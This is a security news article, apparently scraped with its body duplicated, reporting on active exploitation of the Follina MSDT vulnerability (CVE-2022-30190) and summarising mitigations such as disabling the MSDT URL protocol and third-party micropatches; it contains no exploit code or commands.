Attackers are leveraging Follina. What can you do?

As the world is waiting for Microsoft to push out a patch for CVE-2022-30190, aka “Follina”, attackers around the world are exploiting the vulnerability in a variety of campaigns.

A complex vulnerability

Microsoft has described CVE-2022-30190 as a Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability, confirmed it affects an overwheming majority of Windows and Windows Server versions, and advised on a workaround to be implemented until a patch is ready.

Vulnerability analysts and security researchers have shared their own view of the complexity of the issue (s) behind that one CVE:

The wider security community has been poking and creating proof-of-concept exploits for the flaw, as well as converting MSDT exploits so they can be used with other protocol handlers for a different kind of attack.

Attacks in the wild

After the attacks spotted in April and May, which revealed the existence of the flaw and its active exploitation to the wider security community, reports soon started trickling in about other campaigns leveraging it across the globe:

What can defenders do until patches are released?

We have already mentioned Microsoft’s advice, which involves disabling the MSDT URL protocol.

ACROS Security has released free micropatches for various editions of Windows and Windows Server, to be used via their 0patch agent.

SANS Senior Instructor Jake Williams recently answered plainly a number of questions regarding Follina, possible mitigations, and how to detect exploitation attempts.

Security companies have been adding signatures and rules for detecting malicious documents exploiting CVE-2022-30190, as well as providing general advice.

Source

As the world is waiting for Microsoft to push out a patch for CVE-2022-30190, aka “Follina”, attackers around the world are exploiting the vulnerability in a variety of campaigns.

A complex vulnerability

Microsoft has described CVE-2022-30190 as a Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability, confirmed it affects an overwheming majority of Windows and Windows Server versions, and advised on a workaround to be implemented until a patch is ready.

Vulnerability analysts and security researchers have shared their own view of the complexity of the issue (s) behind that one CVE:

The wider security community has been poking and creating proof-of-concept exploits for the flaw, as well as converting MSDT exploits so they can be used with other protocol handlers for a different kind of attack.

Attacks in the wild

After the attacks spotted in April and May, which revealed the existence of the flaw and its active exploitation to the wider security community, reports soon started trickling in about other campaigns leveraging it across the globe:

What can defenders do until patches are released?

We have already mentioned Microsoft’s advice, which involves disabling the MSDT URL protocol.

ACROS Security has released free micropatches for various editions of Windows and Windows Server, to be used via their 0patch agent.

SANS Senior Instructor Jake Williams recently answered plainly a number of questions regarding Follina, possible mitigations, and how to detect exploitation attempts.

Security companies have been adding signatures and rules for detecting malicious documents exploiting CVE-2022-30190, as well as providing general advice.

Source

More from author

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Related posts

Advertismentspot_img

Latest posts

Threat Intelligence Services Are Universally Valued by IT Staff

Almost all IT professionals believe that threat intelligence services and feeds will help their company get ready for and repulse malware attacks. Only...

Black Basta may be an all-star ransomware gang made up of former Conti and REvil members

The group has targeted 50 businesses from English speaking countries since April 2022. ...

APAC companies are failing to build successful digital models: Forrester

Approximately 61% of APAC organizations have failed to build robust and successful digital business business models, primarily due to unsound practices of enterprise architecture...

Want to stay up to date with the latest news?

We would love to hear from you! Please fill in your details and we will stay in touch. It's that simple!